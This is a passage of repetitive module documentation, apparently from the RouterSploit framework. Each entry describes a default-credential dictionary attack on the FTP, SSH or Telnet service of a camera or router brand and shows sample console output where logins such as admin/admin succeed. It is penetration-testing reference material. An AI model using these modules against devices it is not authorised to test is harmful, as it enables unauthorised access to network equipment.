192.168.1.1 21 ftp admin admin ``` ================================================ FILE: docs/modules/creds/cameras/videoiq/ssh_default_creds.md ================================================ ## Description Module performs dictionary attack with default credentials against VideoIQ Camera SSH service. If valid credentials are found, they are displayed to the user. ## Verification Steps 1. Start `./rsf.py` 2. Do: `use creds/cameras/videoiq/ssh_default_creds` 3. Do: `set target [TargetIP]` 4. Do: `run` 5. If valid credentials are found, they are displayed to the user. ## Scenarios ``` rsf > use creds/cameras/videoiq/ssh_default_creds rsf (VideoIQ Camera Default SSH Creds) > set target 192.168.1.1 [+] target => 192.168.1.1 rsf (VideoIQ Camera Default SSH Creds) > run [*] Running module... [*] Target exposes SSH service [*] Starting default credentials attack against SSH service [*] thread-0 thread is starting... [-] SSH Authentication Failed - Username: 'admin' Password: '12345' [-] SSH Authentication Failed - Username: 'admin' Password: '123456' [-] SSH Authentication Failed - Username: 'Admin' Password: '12345' [-] SSH Authentication Failed - Username: 'Admin' Password: '123456' [+] SSH Authentication Successful - Username: 'admin' Password: 'admin' [*] thread-0 thread is terminated. [*] Elapsed time: 2.3932292461395264 seconds [+] Credentials found! Target Port Service Username Password ------ ---- ------- -------- -------- 192.168.1.1 22 ssh admin admin ``` ================================================ FILE: docs/modules/creds/cameras/videoiq/telnet_default_creds.md ================================================ ## Description Module performs dictionary attack with default credentials against VideoIQ Camera Telnet service. If valid credentials are found, they are displayed to the user. ## Verification Steps 1. Start `./rsf.py` 2. Do: `use creds/cameras/videoiq/telnet_default_creds` 3. Do: `set target [TargetIP]` 4. Do: `run` 5. If valid credentials are found, they are displayed to the user. ## Scenarios ``` rsf > use creds/cameras/videoiq/telnet_default_creds rsf (VideoIQ Camera Default Telnet Creds) > set target 192.168.1.1 [+] target => 192.168.1.1 rsf (VideoIQ Camera Default Telnet Creds) > run [*] Running module... [*] Target exposes Telnet service [*] Starting default credentials attack against Telnet service [*] thread-0 thread is starting... [-] Telnet Authentication Failed - Username: 'admin' Password: 'admin' [-] Telnet Authentication Failed - Username: '1234' Password: '1234' [-] Telnet Authentication Failed - Username: 'root' Password: '12345' [-] Telnet Authentication Failed - Username: 'root' Password: 'root' [+] Telnet Authentication Successful - Username: 'user' Password: 'user' [*] thread-0 thread is terminated. [*] Elapsed time: 5.389287948608398 seconds [+] Credentials found! Target Port Service Username Password ------ ---- ------- -------- -------- 192.168.1.1 23 telnet user user ``` ================================================ FILE: docs/modules/creds/routers/asmax/ftp_default_creds.md ================================================ ## Description Module performs dictionary attack with default credentials against Asmax Router FTP service. If valid credentials are found, they are displayed to the user. ## Verification Steps 1. Start `./rsf.py` 2. Do: `use creds/routers/asmax/ftp_default_creds` 3. Do: `set target [TargetIP]` 4. Do: `run` 5. If valid credentials are found, they are displayed to the user. ## Scenarios ``` rsf > use creds/routers/asmax/ftp_default_creds rsf (Asmax Router Default FTP Creds) > set target 192.168.1.1 [+] target => 192.168.1.1 rsf (Asmax Router Default FTP Creds) > run [*] Running module... [*] Target exposes FTP service [*] Starting attack against FTP service [*] thread-0 thread is starting... [-] Authentication Failed - Username: 'admin' Password: '12345' [-] Authentication Failed - Username: 'admin' Password: '123456' [-] Authentication Failed - Username: 'Admin' Password: '12345' [-] Authentication Failed - Username: 'Admin' Password: '123456' [+] Authenticated Succeed - Username: 'admin' Password: 'admin' [*] thread-0 thread is terminated. [*] Elapsed time: 0.06290411949157715 seconds [+] Credentials found! Target Port Service Username Password ------ ---- ------- -------- -------- 192.168.1.1 21 ftp admin admin ``` ================================================ FILE: docs/modules/creds/routers/asmax/ssh_default_creds.md ================================================ ## Description Module performs dictionary attack with default credentials against Asmax Camera SSH service. If valid credentials are found, they are displayed to the user. ## Verification Steps 1. Start `./rsf.py` 2. Do: `use creds/routers/asmax/ssh_default_creds` 3. Do: `set target [TargetIP]` 4. Do: `run` 5. If valid credentials are found, they are displayed to the user. ## Scenarios ``` rsf > use creds/routers/asmax/ssh_default_creds rsf (Asmax Router Default SSH Creds) > set target 192.168.1.1 [+] target => 192.168.1.1 rsf (Asmax Router Default SSH Creds) > run [*] Running module... [*] Target exposes SSH service [*] Starting default credentials attack against SSH service [*] thread-0 thread is starting... [-] SSH Authentication Failed - Username: 'admin' Password: '12345' [-] SSH Authentication Failed - Username: 'admin' Password: '123456' [-] SSH Authentication Failed - Username: 'Admin' Password: '12345' [-] SSH Authentication Failed - Username: 'Admin' Password: '123456' [+] SSH Authentication Successful - Username: 'admin' Password: 'admin' [*] thread-0 thread is terminated. [*] Elapsed time: 2.3932292461395264 seconds [+] Credentials found! Target Port Service Username Password ------ ---- ------- -------- -------- 192.168.1.1 22 ssh admin admin ``` ================================================ FILE: docs/modules/creds/routers/asmax/telnet_default_creds.md ================================================ ## Description Module performs dictionary attack with default credentials against Asmax Router Telnet service. If valid credentials are found, they are displayed to the user. ## Verification Steps 1. Start `./rsf.py` 2. Do: `use creds/routers/asmax/telnet_default_creds` 3. Do: `set target [TargetIP]` 4. Do: `run` 5. If valid credentials are found, they are displayed to the user. ## Scenarios ``` rsf > use creds/routers/asmax/telnet_default_creds rsf (Asmax Router Default Telnet Creds) > set target 192.168.1.1 [+] target => 192.168.1.1 rsf (Asmax Router Default Telnet Creds) > run [*] Running module... [*] Target exposes Telnet service [*] Starting default credentials attack against Telnet service [*] thread-0 thread is starting... [-] Telnet Authentication Failed - Username: 'admin' Password: 'admin' [-] Telnet Authentication Failed - Username: '1234' Password: '1234' [-] Telnet Authentication Failed - Username: 'root' Password: '12345' [-] Telnet Authentication Failed - Username: 'root' Password: 'root' [+] Telnet Authentication Successful - Username: 'user' Password: 'user' [*] thread-0 thread is terminated. [*] Elapsed time: 5.389287948608398 seconds [+] Credentials found! Target Port Service Username Password ------ ---- ------- -------- -------- 192.168.1.1 23 telnet user user ``` ================================================ FILE: docs/modules/creds/routers/asus/ftp_default_creds.md ================================================ ## Description Module performs dictionary attack with default credentials against Asus Router FTP service. If valid credentials are found, they are displayed to the user. ## Verification Steps 1. Start `./rsf.py` 2. Do: `use creds/routers/asus/ftp_default_creds` 3. Do: `set target [TargetIP]` 4. Do: `run` 5. If valid credentials are found, they are displayed to the user. ## Scenarios ``` rsf > use creds/routers/asus/ftp_default_creds rsf (Asus Router Default FTP Creds) > set target 192.168.1.1 [+] target => 192.168.1.1 rsf (Asus Router Default FTP Creds) > run [*] Running module... [*] Target exposes FTP service [*] Starting attack against FTP service [*] thread-0 thread is starting... [-] Authentication Failed - Username: 'admin' Password: '12345' [-] Authentication Failed - Username: 'admin' Password: '123456' [-] Authentication Failed - Username: 'Admin' Password: '12345' [-] Authentication Failed - Username: 'Admin' Password: '123456' [+] Authenticated Succeed - Username: 'admin' Password: 'admin' [*] thread-0 thread is terminated. [*] Elapsed time: 0.06290411949157715 seconds [+] Credentials found! Target Port Service Username Password ------ ---- ------- -------- -------- 192.168.1.1 21 ftp admin admin ``` ================================================ FILE: docs/modules/creds/routers/asus/ssh_default_creds.md ================================================ ## Description Module performs dictionary attack with default credentials against Asus Router SSH service. If valid credentials are found, they are displayed to the user. ## Verification Steps 1. Start `./rsf.py` 2. Do: `use creds/routers/asus/ssh_default_creds` 3. Do: `set target [TargetIP]` 4. Do: `run` 5. If valid credentials are found, they are displayed to the user. ## Scenarios ``` rsf > use creds/routers/asus/ssh_default_creds rsf (Asus Router Default SSH Creds) > set target 192.168.1.1 [+] target => 192.168.1.1 rsf (Asus Router Default SSH Creds) > run [*] Running module... [*] Target exposes SSH service [*] Starting default credentials attack against SSH service [*] thread-0 thread is starting... [-] SSH Authentication Failed - Username: 'admin' Password: '12345' [-] SSH Authentication Failed - Username: 'admin' Password: '123456' [-] SSH Authentication Failed - Username: 'Admin' Password: '12345' [-] SSH Authentication Failed - Username: 'Admin' Password: '123456' [+] SSH Authentication Successful - Username: 'admin' Password: 'admin' [*] thread-0 thread is terminated. [*] Elapsed time: 2.3932292461395264 seconds [+] Credentials found! Target Port Service Username Password ------ ---- ------- -------- -------- 192.168.1.1 22 ssh admin admin ``` ================================================ FILE: docs/modules/creds/routers/asus/telnet_default_creds.md ================================================ ## Description Module performs dictionary attack with default credentials against Asus Router Telnet service. If valid credentials are found, they are displayed to the user. ## Verification Steps 1. Start `./rsf.py` 2. Do: `use creds/routers/asus/telnet_default_creds` 3. Do: `set target [TargetIP]` 4. Do: `run` 5. If valid credentials are found, they are displayed to the user. ## Scenarios ``` rsf > use creds/routers/asus/telnet_default_creds rsf (Asus Router Default Telnet Creds) > set target 192.168.1.1 [+] target => 192.168.1.1 rsf (Asus Router Default Telnet Creds) > run [*] Running module... [*] Target exposes Telnet service [*] Starting default credentials attack against Telnet service [*] thread-0 thread is starting... [-] Telnet Authentication Failed - Username: 'admin' Password: 'admin' [-] Telnet Authentication Failed - Username: '1234' Password: '1234' [-] Telnet Authentication Failed - Username: 'root' Password: '12345' [-] Telnet Authentication Failed - Username: 'root' Password: 'root' [+] Telnet Authentication Successful - Username: 'user' Password: 'user' [*] thread-0 thread is terminated. [*] Elapsed time: 5.389287948608398 seconds [+] Credentials found! Target Port Service Username Password ------ ---- ------- -------- -------- 192.168.1.1 23 telnet user user ``` ================================================ FILE: docs/modules/creds/routers/belkin/ftp_default_creds.md ================================================ ## Description Module performs dictionary attack with default credentials against Belkin Router FTP service. If valid credentials are found, they are displayed to the user. ## Verification Steps 1. Start `./rsf.py` 2. Do: `use creds/routers/belkin/ftp_default_creds` 3. Do: `set target [TargetIP]` 4. Do: `run` 5. If valid credentials are found, they are displayed to the user. ## Scenarios ``` rsf > use creds/routers/belkin/ftp_default_creds rsf (Belkin Router Default FTP Creds) > set target 192.168.1.1 [+] target => 192.168.1.1 rsf (Belkin Router Default FTP Creds) > run [*] Running module... [*] Target exposes FTP service [*] Starting attack against FTP service [*] thread-0 thread is starting... [-] Authentication Failed - Username: 'admin' Password: '12345' [-] Authentication Failed - Username: 'admin' Password: '123456' [-] Authentication Failed - Username: 'Admin' Password: '12345' [-] Authentication Failed - Username: 'Admin' Password: '123456' [+] Authenticated Succeed - Username: 'admin' Password: 'admin' [*] thread-0 thread is terminated. [*] Elapsed time: 0.06290411949157715 seconds [+] Credentials found! Target Port Service Username Password ------ ---- ------- -------- -------- 192.168.1.1 21 ftp admin admin ``` ================================================ FILE: docs/modules/creds/routers/belkin/ssh_default_creds.md ================================================ ## Description Module performs dictionary attack with default credentials against Belkin Router SSH service. If valid credentials are found, they are displayed to the user. ## Verification Steps 1. Start `./rsf.py` 2. Do: `use creds/routers/belkin/ssh_default_creds` 3. Do: `set target [TargetIP]` 4. Do: `run` 5. If valid credentials are found, they are displayed to the user. ## Scenarios ``` rsf > use creds/routers/belkin/ssh_default_creds rsf (Belkin Router Default SSH Creds) > set target 192.168.1.1 [+] target => 192.168.1.1 rsf (Belkin Router Default SSH Creds) > run [*] Running module... [*] Target exposes SSH service [*] Starting default credentials attack against SSH service [*] thread-0 thread is starting... [-] SSH Authentication Failed - Username: 'admin' Password: '12345' [-] SSH Authentication Failed - Username: 'admin' Password: '123456' [-] SSH Authentication Failed - Username: 'Admin' Password: '12345' [-] SSH Authentication Failed - Username: 'Admin' Password: '123456' [+] SSH Authentication Successful - Username: 'admin' Password: 'admin' [*] thread-0 thread is terminated. [*] Elapsed time: 2.3932292461395264 seconds [+] Credentials found! Target Port Service Username Password ------ ---- ------- -------- -------- 192.168.1.1 22 ssh admin admin ``` ================================================ FILE: docs/modules/creds/routers/belkin/telnet_default_creds.md ================================================ ## Description Module performs dictionary attack with default credentials against Belkin Router Telnet service. If valid credentials are found, they are displayed to the user. ## Verification Steps 1. Start `./rsf.py` 2. Do: `use creds/routers/belkin/telnet_default_creds` 3. Do: `set target [TargetIP]` 4. Do: `run` 5. If valid credentials are found, they are displayed to the user. ## Scenarios ``` rsf > use creds/routers/belkin/telnet_default_creds rsf (Belkin Router Default Telnet Creds) > set target 192.168.1.1 [+] target => 192.168.1.1 rsf (Belkin Router Default Telnet Creds) > run [*] Running module... [*] Target exposes Telnet service [*] Starting default credentials attack against Telnet service [*] thread-0 thread is starting... [-] Telnet Authentication Failed - Username: 'admin' Password: 'admin' [-] Telnet Authentication Failed - Username: '1234' Password: '1234' [-] Telnet Authentication Failed - Username: 'root' Password: '12345' [-] Telnet Authentication Failed - Username: 'root' Password: 'root' [+] Telnet Authentication Successful - Username: 'user' Password: 'user' [*] thread-0 thread is terminated. [*] Elapsed time: 5.389287948608398 seconds [+] Credentials found! Target Port Service Username Password ------ ---- ------- -------- -------- 192.168.1.1 23 telnet user user ``` ================================================ FILE: docs/modules/creds/routers/bhu/ftp_default_creds.md ================================================ ## Description Module performs dictionary attack with default credentials against Bhu Router FTP service. If valid credentials are found, they are displayed to the user. ## Verification Steps 1. Start `./rsf.py` 2. Do: `use creds/routers/bhu/ftp_default_creds` 3. Do: `set target [TargetIP]` 4. Do: `run` 5. If valid credentials are found, they are displayed to the user. ## Scenarios ``` rsf > use creds/routers/bhu/ftp_default_creds rsf (Bhu Router Default FTP Creds) > set target 192.168.1.1 [+] target => 192.168.1.1 rsf (Bhu Router Default FTP Creds) > run [*] Running module... [*] Target exposes FTP service [*] Starting attack against FTP service [*] thread-0 thread is starting... [-] Authentication Failed - Username: 'admin' Password: '12345' [-] Authentication Failed - Username: 'admin' Password: '123456' [-] Authentication Failed - Username: 'Admin' Password: '12345' [-] Authentication Failed - Username: 'Admin' Password: '123456' [+] Authenticated Succeed - Username: 'admin' Password: 'admin' [*] thread-0 thread is terminated. [*] Elapsed time: 0.06290411949157715 seconds [+] Credentials found! Target Port Service Username Password ------ ---- ------- -------- -------- 192.168.1.1 21 ftp admin admin ``` ================================================ FILE: docs/modules/creds/routers/bhu/ssh_default_creds.md ================================================ ## Description Module performs dictionary attack with default credentials against Bhu Router SSH service. If valid credentials are found, they are displayed to the user. ## Verification Steps 1. Start `./rsf.py` 2. Do: `use creds/routers/bhu/ssh_default_creds` 3. Do: `set target [TargetIP]` 4. Do: `run` 5. If valid credentials are found, they are displayed to the user. ## Scenarios ``` rsf > use creds/routers/bhu/ssh_default_creds rsf (Bhu Router Default SSH Creds) > set target 192.168.1.1 [+] target => 192.168.1.1 rsf (Bhu Router Default SSH Creds) > run [*] Running module... [*] Target exposes SSH service [*] Starting default credentials attack against SSH service [*] thread-0 thread is starting... [-] SSH Authentication Failed - Username: 'admin' Password: '12345' [-] SSH Authentication Failed - Username: 'admin' Password: '123456' [-] SSH Authentication Failed - Username: 'Admin' Password: '12345' [-] SSH Authentication Failed - Username: 'Admin' Password: '123456' [+] SSH Authentication Successful - Username: 'admin' Password: 'admin' [*] thread-0 thread is terminated. [*] Elapsed time: 2.3932292461395264 seconds [+] Credentials found! Target Port Service Username Password ------ ---- ------- -------- -------- 192.168.1.1 22 ssh admin admin ``` ================================================ FILE: docs/modules/creds/routers/bhu/telnet_default_creds.md ================================================ ## Description Module performs dictionary attack with default credentials against Bhu Router Telnet service. If valid credentials are found, they are displayed to the user. ## Verification Steps 1. Start `./rsf.py` 2. Do: `use creds/routers/bhu/telnet_default_creds` 3. Do: `set target [TargetIP]` 4. Do: `run` 5. If valid credentials are found, they are displayed to the user. ## Scenarios ``` rsf > use creds/routers/bhu/telnet_default_creds rsf (Bhu Router Default Telnet Creds) > set target 192.168.1.1 [+] target => 192.168.1.1 rsf (Bhu Router Default Telnet Creds) > run [*] Running module... [*] Target exposes Telnet service [*] Starting default credentials attack against Telnet service [*] thread-0 thread is starting... [-] Telnet Authentication Failed - Username: 'admin' Password: 'admin' [-] Telnet Authentication Failed - Username: '1234' Password: '1234' [-] Telnet Authentication Failed - Username: 'root' Password: '12345' [-] Telnet Authentication Failed - Username: 'root' Password: 'root' [+] Telnet Authentication Successful - Username: 'user' Password: 'user' [*] thread-0 thread is terminated. [*] Elapsed time: 5.389287948608398 seconds [+] Credentials found! Target Port Service Username Password ------ ---- ------- -------- -------- 192.168.1.1 23 telnet user user ``` ================================================ FILE: docs/modules/creds/routers/billion/ftp_default_creds.md ================================================ ## Description Module performs dictionary attack with default credentials against Billion Router FTP service. If valid credentials are found, they are displayed to the user. ## Verification Steps 1. Start `./rsf.py` 2. Do: `use creds/routers/billion/ftp_default_creds` 3. Do: `set target [TargetIP]` 4. Do: `run` 5. If valid credentials are found, they are displayed to the user. ## Scenarios ``` rsf > use creds/routers/billion/ftp_default_creds rsf (Billion Router Default FTP Creds) > set target 192.168.1.1 [+] target => 192.168.1.1 rsf (Billion Router Default FTP Creds) > run [*] Running module... [*] Target exposes FTP service [*] Starting attack against FTP service [*] thread-0 thread is starting... [-] Authentication Failed - Username: 'admin' Password: '12345' [-] Authentication Failed - Username: 'admin' Password: '123456' [-] Authentication Failed - Username: 'Admin' Password: '12345' [-] Authentication Failed - Username: 'Admin' Password: '123456' [+] Authenticated Succeed - Username: 'admin' Password: 'admin' [*] thread-0 thread is terminated. [*] Elapsed time: 0.06290411949157715 seconds [+] Credentials found! Target Port Service Username Password ------ ---- ------- -------- -------- 192.168.1.1 21 ftp admin admin ``` ================================================ FILE: docs/modules/creds/routers/billion/ssh_default_creds.md ================================================ ## Description Module performs dictionary attack with default credentials against Billion Router SSH service. If valid credentials are found, they are displayed to the user. ## Verification Steps 1. Start `./rsf.py` 2. Do: `use creds/routers/billion/ssh_default_creds` 3. Do: `set target [TargetIP]` 4. Do: `run` 5. If valid credentials are found, they are displayed to the user. ## Scenarios ``` rsf > use creds/routers/billion/ssh_default_creds rsf (Billion Router Default SSH Creds) > set target 192.168.1.1 [+] target => 192.168.1.1 rsf (Billion Router Default SSH Creds) > run [*] Running module... [*] Target exposes SSH service [*] Starting default credentials attack against SSH service [*] thread-0 thread is starting... [-] SSH Authentication Failed - Username: 'admin' Password: '12345' [-] SSH Authentication Failed - Username: 'admin' Password: '123456' [-] SSH Authentication Failed - Username: 'Admin' Password: '12345' [-] SSH Authentication Failed - Username: 'Admin' Password: '123456' [+] SSH Authentication Successful - Username: 'admin' Password: 'admin' [*] thread-0 thread is terminated. [*] Elapsed time: 2.3932292461395264 seconds [+] Credentials found! Target Port Service Username Password ------ ---- ------- -------- -------- 192.168.1.1 22 ssh admin admin ``` ================================================ FILE: docs/modules/creds/routers/billion/telnet_default_creds.md ================================================ ## Description Module performs dictionary attack with default credentials against Billion Router Telnet service. If valid credentials are found, they are displayed to the user. ## Verification Steps 1. Start `./rsf.py` 2. Do: `use creds/routers/billion/telnet_default_creds` 3. Do: `set target [TargetIP]` 4. Do: `run` 5. If valid credentials are found, they are displayed to the user. ## Scenarios ``` rsf > use creds/routers/billion/telnet_default_creds rsf (Billion Router Default Telnet Creds) > set target 192.168.1.1 [+] target => 192.168.1.1 rsf (Billion Router Default Telnet Creds) > run [*] Running module... [*] Target exposes Telnet service [*] Starting default credentials attack against Telnet service [*] thread-0 thread is starting... [-] Telnet Authentication Failed - Username: 'admin' Password: 'admin' [-] Telnet Authentication Failed - Username: '1234' Password: '1234' [-] Telnet Authentication Failed - Username: 'root' Password: '12345' [-] Telnet Authentication Failed - Username: 'root' Password: 'root' [+] Telnet Authentication Successful - Username: 'user' Password: 'user' [*] thread-0 thread is terminated. [*] Elapsed time: 5.389287948608398 seconds [+] Credentials found! Target Port Service Username Password ------ ---- ------- -------- -------- 192.168.1.1 23 telnet user user ``` ================================================ FILE: docs/modules/creds/routers/cisco/ftp_default_creds.md ================================================ ## Description Module performs dictionary attack with default credentials against Cisco Router FTP service. If valid credentials are found, they are displayed to the user. ## Verification Steps 1. Start `./rsf.py` 2. Do: `use creds/routers/cisco/ftp_default_creds` 3. Do: `set target [TargetIP]` 4. Do: `run` 5. If valid credentials are found, they are displayed to the user. ## Scenarios ``` rsf > use creds/routers/cisco/ftp_default_creds rsf (Cisco Router Default FTP Creds) > set target 192.168.1.1 [+] target => 192.168.1.1 rsf (Cisco Router Default FTP Creds) > run [*] Running module... [*] Target exposes FTP service [*] Starting attack against FTP service [*] thread-0 thread is starting... [-] Authentication Failed - Username: 'admin' Password: '12345' [-] Authentication Failed - Username: 'admin' Password: '123456' [-] Authentication Failed - Username: 'Admin' Password: '12345' [-] Authentication Failed - Username: 'Admin' Password: '123456' [+] Authenticated Succeed - Username: 'admin' Password: 'admin' [*] thread-0 thread is terminated. [*] Elapsed time: 0.06290411949157715 seconds [+] Credentials found! Target Port Service Username Password ------ ---- ------- -------- -------- 192.168.1.1 21 ftp admin admin ``` ================================================ FILE: docs/modules/creds/routers/cisco/ssh_default_creds.md ================================================ ## Description Module performs dictionary attack with default credentials against Cisco Router SSH service. If valid credentials are found, they are displayed to the user. ## Verification Steps 1. Start `./rsf.py` 2. Do: `use creds/routers/cisco/ssh_default_creds` 3. Do: `set target [TargetIP]` 4. Do: `run` 5. If valid credentials are found, they are displayed to the user. ## Scenarios ``` rsf > use creds/routers/cisco/ssh_default_creds rsf (Cisco Router Default SSH Creds) > set target 192.168.1.1 [+] target => 192.168.1.1 rsf (Cisco Router Default SSH Creds) > run [*] Running module... [*] Target exposes SSH service [*] Starting default credentials attack against SSH service [*] thread-0 thread is starting... [-] SSH Authentication Failed - Username: 'admin' Password: '12345' [-] SSH Authentication Failed - Username: 'admin' Password: '123456' [-] SSH Authentication Failed - Username: 'Admin' Password: '12345' [-] SSH Authentication Failed - Username: 'Admin' Password: '123456' [+] SSH Authentication Successful - Username: 'admin' Password: 'admin' [*] thread-0 thread is terminated. [*] Elapsed time: 2.3932292461395264 seconds [+] Credentials found! Target Port Service Username Password ------ ---- ------- -------- -------- 192.168.1.1 22 ssh admin admin ``` ================================================ FILE: docs/modules/creds/routers/cisco/telnet_default_creds.md ================================================ ## Description Module performs dictionary attack with default credentials against Cisco Router Telnet service. If valid credentials are found, they are displayed to the user. ## Verification Steps 1. Start `./rsf.py` 2. Do: `use creds/routers/cisco/telnet_default_creds` 3. Do: `set target [TargetIP]` 4. Do: `run` 5. If valid credentials are found, they are displayed to the user. ## Scenarios ``` rsf > use creds/routers/cisco/telnet_default_creds rsf (Cisco Router Default Telnet Creds) > set target 192.168.1.1 [+] target => 192.168.1.1 rsf (Cisco Router Default Telnet Creds) > run [*] Running module... [*] Target exposes Telnet service [*] Starting default credentials attack against Telnet service [*] thread-0 thread is starting... [-] Telnet Authentication Failed - Username: 'admin' Password: 'admin' [-] Telnet Authentication Failed - Username: '1234' Password: '1234' [-] Telnet Authentication Failed - Username: 'root' Password: '12345' [-] Telnet Authentication Failed - Username: 'root' Password: 'root' [+] Telnet Authentication Successful - Username: 'user' Password: 'user' [*] thread-0 thread is terminated. [*] Elapsed time: 5.389287948608398 seconds [+] Credentials found! Target Port Service Username Password ------ ---- ------- -------- -------- 192.168.1.1 23 telnet user user ``` ================================================ FILE: docs/modules/creds/routers/comtrend/ftp_default_creds.md ================================================ ## Description Module performs dictionary attack with default credentials against Comtrend Router FTP service. If valid credentials are found, they are displayed to the user. ## Verification Steps 1. Start `./rsf.py` 2. Do: `use creds/routers/comtrend/ftp_default_creds` 3. Do: `set target [TargetIP]` 4. Do: `run` 5. If valid credentials are found, they are displayed to the user. ## Scenarios ``` rsf > use creds/routers/comtrend/ftp_default_creds rsf (Comtrend Router Default FTP Creds) > set target 192.168.1.1 [+] target => 192.168.1.1 rsf (Comtrend Router Default FTP Creds) > run [*] Running module... [*] Target exposes FTP service [*] Starting attack against FTP service [*] thread-0 thread is starting... [-] Authentication Failed - Username: 'admin' Password: '12345' [-] Authentication Failed - Username: 'admin' Password: '123456' [-] Authentication Failed - Username: 'Admin' Password: '12345' [-] Authentication Failed - Username: 'Admin' Password: '123456' [+] Authenticated Succeed - Username: 'admin' Password: 'admin' [*] thread-0 thread is terminated. [*] Elapsed time: 0.06290411949157715 seconds [+] Credentials found! Target Port Service Username Password ------ ---- ------- -------- -------- 192.168.1.1 21 ftp admin admin ``` ================================================ FILE: docs/modules/creds/routers/comtrend/ssh_default_creds.md ================================================ ## Description Module performs dictionary attack with default credentials against Comtrend Router SSH service. If valid credentials are found, they are displayed to the user. ## Verification Steps 1. Start `./rsf.py` 2. Do: `use creds/routers/comtrend/ssh_default_creds` 3. Do: `set target [TargetIP]` 4. Do: `run` 5. If valid credentials are found, they are displayed to the user. ## Scenarios ``` rsf > use creds/routers/comtrend/ssh_default_creds rsf (Comtrend Router Default SSH Creds) > set target 192.168.1.1 [+] target => 192.168.1.1 rsf (Comtrend Router Default SSH Creds) > run [*] Running module... [*] Target exposes SSH service [*] Starting default credentials attack against SSH service [*] thread-0 thread is starting... [-] SSH Authentication Failed - Username: 'admin' Password: '12345' [-] SSH Authentication Failed - Username: 'admin' Password: '123456' [-] SSH Authentication Failed - Username: 'Admin' Password: '12345' [-] SSH Authentication Failed - Username: 'Admin' Password: '123456' [+] SSH Authentication Successful - Username: 'admin' Password: 'admin' [*] thread-0 thread is terminated. [*] Elapsed time: 2.3932292461395264 seconds [+] Credentials found! Target Port Service Username Password ------ ---- ------- -------- -------- 192.168.1.1 22 ssh admin admin ``` ================================================ FILE: docs/modules/creds/routers/comtrend/telnet_default_creds.md ================================================ ## Description Module performs dictionary attack with default credentials against Comtrend Router Telnet service. If valid credentials are found, they are displayed to the user. ## Verification Steps 1. Start `./rsf.py` 2. Do: `use creds/routers/comtrend/telnet_default_creds` 3. Do: `set target [TargetIP]` 4. Do: `run` 5. If valid credentials are found, they are displayed to the user. ## Scenarios ``` rsf > use creds/routers/comtrend/telnet_default_creds rsf (Comtrend Router Default Telnet Creds) > set target 192.168.1.1 [+] target => 192.168.1.1 rsf (Comtrend Router Default Telnet Creds) > run [*] Running module... [*] Target exposes Telnet service [*] Starting default credentials attack against Telnet service [*] thread-0 thread is starting... [-] Telnet Authentication Failed - Username: 'admin' Password: 'admin' [-] Telnet Authentication Failed - Username: '1234' Password: '1234' [-] Telnet Authentication Failed - Username: 'root' Password: '12345' [-] Telnet Authentication Failed - Username: 'root' Password: 'root' [+] Telnet Authentication Successful - Username: 'user' Password: 'user' [*] thread-0 thread is terminated. [*] Elapsed time: 5.389287948608398 seconds [+] Credentials found! Target Port Service Username Password ------ ---- ------- -------- -------- 192.168.1.1 23 telnet user user ``` ================================================ FILE: docs/modules/creds/routers/dlink/ftp_default_creds.md ================================================ ## Description Module performs dictionary attack with default credentials against D-Link Router FTP service. If valid credentials are found, they are displayed to the user. ## Verification Steps 1. Start `./rsf.py` 2. Do: `use creds/routers/dlink/ftp_default_creds` 3. Do: `set target [TargetIP]` 4. Do: `run` 5. If valid credentials are found, they are displayed to the user. ## Scenarios ``` rsf > use creds/routers/dlink/ftp_default_creds rsf (D-Link Router Default FTP Creds) > set target 192.168.1.1 [+] target => 192.168.1.1 rsf (D-Link Router Default FTP Creds) > run [*] Running module... [*] Target exposes FTP service [*] Starting attack against FTP service [*] thread-0 thread is starting... [-] Authentication Failed - Username: 'admin' Password: '12345' [-] Authentication Failed - Username: 'admin' Password: '123456' [-] Authentication Failed - Username: 'Admin' Password: '12345' [-] Authentication Failed - Username: 'Admin' Password: '123456' [+] Authenticated Succeed - Username: 'admin' Password: 'admin' [*] thread-0 thread is terminated. [*] Elapsed time: 0.06290411949157715 seconds [+] Credentials found! Target Port Service Username Password ------ ---- ------- -------- -------- 192.168.1.1 21 ftp admin admin ``` ================================================ FILE: docs/modules/creds/routers/dlink/ssh_default_creds.md ================================================ ## Description Module performs dictionary attack with default credentials against D-Link Router SSH service. If valid credentials are found, they are displayed to the user. ## Verification Steps 1. Start `./rsf.py` 2. Do: `use creds/routers/dlink/ssh_default_creds` 3. Do: `set target [TargetIP]` 4. Do: `run` 5. If valid credentials are found, they are displayed to the user. ## Scenarios ``` rsf > use creds/routers/dlink/ssh_default_creds rsf (D-Link Router Default SSH Creds) > set target 192.168.1.1 [+] target => 192.168.1.1 rsf (D-Link Router Default SSH Creds) > run [*] Running module... [*] Target exposes SSH service [*] Starting default credentials attack against SSH service [*] thread-0 thread is starting... [-] SSH Authentication Failed - Username: 'admin' Password: '12345' [-] SSH Authentication Failed - Username: 'admin' Password: '123456' [-] SSH Authentication Failed - Username: 'Admin' Password: '12345' [-] SSH Authentication Failed - Username: 'Admin' Password: '123456' [+] SSH Authentication Successful - Username: 'admin' Password: 'admin' [*] thread-0 thread is terminated. [*] Elapsed time: 2.3932292461395264 seconds [+] Credentials found! Target Port Service Username Password ------ ---- ------- -------- -------- 192.168.1.1 22 ssh admin admin ``` ================================================ FILE: docs/modules/creds/routers/dlink/telnet_default_creds.md ================================================ ## Description Module performs dictionary attack with default credentials against D-Link Router Telnet service. If valid credentials are found, they are displayed to the user. ## Verification Steps 1. Start `./rsf.py` 2. Do: `use creds/routers/dlink/telnet_default_creds` 3. Do: `set target [TargetIP]` 4. Do: `run` 5. If valid credentials are found, they are displayed to the user. ## Scenarios ``` rsf > use creds/routers/dlink/telnet_default_creds rsf (D-Link Router Default Telnet Creds) > set target 192.168.1.1 [+] target => 192.168.1.1 rsf (D-Link Router Default Telnet Creds) > run [*] Running module... [*] Target exposes Telnet service [*] Starting default credentials attack against Telnet service [*] thread-0 thread is starting... [-] Telnet Authentication Failed - Username: 'admin' Password: 'admin' [-] Telnet Authentication Failed - Username: '1234' Password: '1234' [-] Telnet Authentication Failed - Username: 'root' Password: '12345' [-] Telnet Authentication Failed - Username: 'root' Password: 'root' [+] Telnet Authentication Successful - Username: 'user' Password: 'user' [*] thread-0 thread is terminated. [*] Elapsed time: 5.389287948608398 seconds [+] Credentials found! Target Port Service Username Password ------ ---- ------- -------- -------- 192.168.1.1 23 telnet user user ``` ================================================ FILE: docs/modules/creds/routers/fortinet/ftp_default_creds.md ================================================ ## Description Module performs dictionary attack with default credentials against Fortined Router FTP service. If valid credentials are found, they are displayed to the user. ## Verification Steps 1. Start `./rsf.py` 2. Do: `use creds/routers/fortinet/ftp_default_creds` 3. Do: `set target [TargetIP]` 4. Do: `run` 5. If 